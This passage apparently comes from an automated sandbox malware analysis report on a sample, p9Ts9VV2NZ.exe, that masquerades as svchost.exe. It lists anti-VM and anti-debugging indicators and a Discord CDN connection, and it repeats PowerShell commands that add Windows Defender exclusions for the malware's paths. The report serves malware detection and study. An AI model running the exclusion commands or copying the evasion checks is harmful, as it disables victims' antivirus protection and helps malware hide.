    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Yara detected AntiVM3Show sources
    Source: Yara matchFile source: 13.0.svchost.exe.45d7a78.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.44d7a58.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.45d7a78.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.48f0000.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.47955b0.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.45d5550.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.3795550.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.48f0000.19.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.5370000.7.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.45d7a78.7.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.47955b0.15.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.44d7a58.17.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.48f0000.19.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.47955b0.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.45d7a78.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.39555b0.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.47955b0.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.4615570.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.48f0000.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.47955b0.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.45b5530.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.4530000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.47955b0.15.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.4615570.14.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.45d5550.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.svchost.exe.45b5530.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.4530000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.44d7a58.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.5370000.17.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.44d7a58.17.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.39555b0.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.4615570.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.37d5570.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.5370000.17.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.0.p9Ts9VV2NZ.exe.3775530.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.5370000.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.45d5550.13.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.45b5530.12.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0000000D.00000000.432859134.00000000045D7000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.439836868.0000000005370000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.433302468.00000000048F0000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.341425610.0000000003531000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.453811934.00000000045D7000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.455922021.0000000004371000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.461938081.0000000005370000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.346751423.0000000003955000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.567889136.0000000004371000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.576244097.0000000004795000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.457226716.0000000004795000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.354707047.0000000004530000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.454733014.00000000048F0000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.435662892.0000000004795000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTR
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.341425610.0000000003531000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000000.432859134.00000000045D7000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.341425610.0000000003531000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000000.432859134.00000000045D7000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4140Thread sleep count: 5700 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4140Thread sleep count: 527 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5708Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep count: 4551 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep count: 709 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6292Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exe TID: 6680Thread sleep time: -17524406870024063s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5700
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 527
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5084
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 539
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4551
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 709
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWindow / User API: threadDelayed 3902
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWindow / User API: threadDelayed 5336
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWindow / User API: foregroundWindowGot 387
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeWindow / User API: foregroundWindowGot 359
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread delayed: delay time: 922337203685477
    Source: svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
    Source: svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
    Source: svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: vmware
    Source: svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.341425610.0000000003531000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000000.432859134.00000000045D7000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
    Source: svchost.exe, 0000000F.00000000.424962158.0000000001492000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
    Source: svchost.exe, 0000000F.00000000.434239516.0000000004371000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp, p9Ts9VV2NZ.exe, 00000009.00000002.560188306.0000000001221000.00000004.00000020.sdmp, svchost.exe, 0000000F.00000002.559839480.000000000144F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

    Anti Debugging:

    barindex
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess queried: DebugPort
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess queried: DebugPort
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess queried: DebugPort
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess queried: DebugPort
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 2636
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Users\Public\Documents\???????????????\svchost.exeDomain query: cdn.discordapp.com
    Source: C:\Users\Public\Documents\???????????????\svchost.exeNetwork Connect: 162.159.129.233 443
    Source: C:\Users\Public\Documents\???????????????\svchost.exeNetwork Connect: 162.159.134.233 443
    Adds a directory exclusion to Windows DefenderShow sources
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 2636
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4588 -ip 4588
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6568 -ip 6568
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6828 -ip 6828
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 2604
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
